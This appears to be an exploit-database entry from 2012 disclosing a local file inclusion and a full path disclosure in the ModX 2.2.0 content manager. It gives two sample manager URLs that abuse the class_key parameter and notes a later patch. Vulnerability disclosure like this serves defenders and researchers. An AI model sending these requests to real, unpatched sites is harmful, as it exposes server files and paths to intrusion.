ModX 2.2.0 - Multiple Vulnerabilities

Author: n0tch
type: webapps
platform: php
port: 
date_added: 2012-03-14 
date_updated: 2012-03-14 
verified: 0 
codes: OSVDB-80603;OSVDB-80602 
tags: 
aliases:  
screenshot_url:  
application_url: 

# Exploit Title: Modx 2.2.0 LFI and Full Path Disclosure
# Google Dork: [if relevant]  (we will automatically add these to the GHDB)
# Date: 13/03/2012
# Author: n0tch aka andmuchmore
# Software Link: http://modx.com/download/
# Version: 2.2.0
# Tested on:  Windows XP/ Windows 7 / Ubuntu


+[-- LFI --]+

http://localhost/cms/manager/?a=55&class_key=

** Filter added in 2.2.0pl2 **


+[-- FPD --]+

http://localhost/cms/manager/?a=55&class_key=somefilethatdoesntexsist

+[-- Shoutz --]+

All the belegit crew..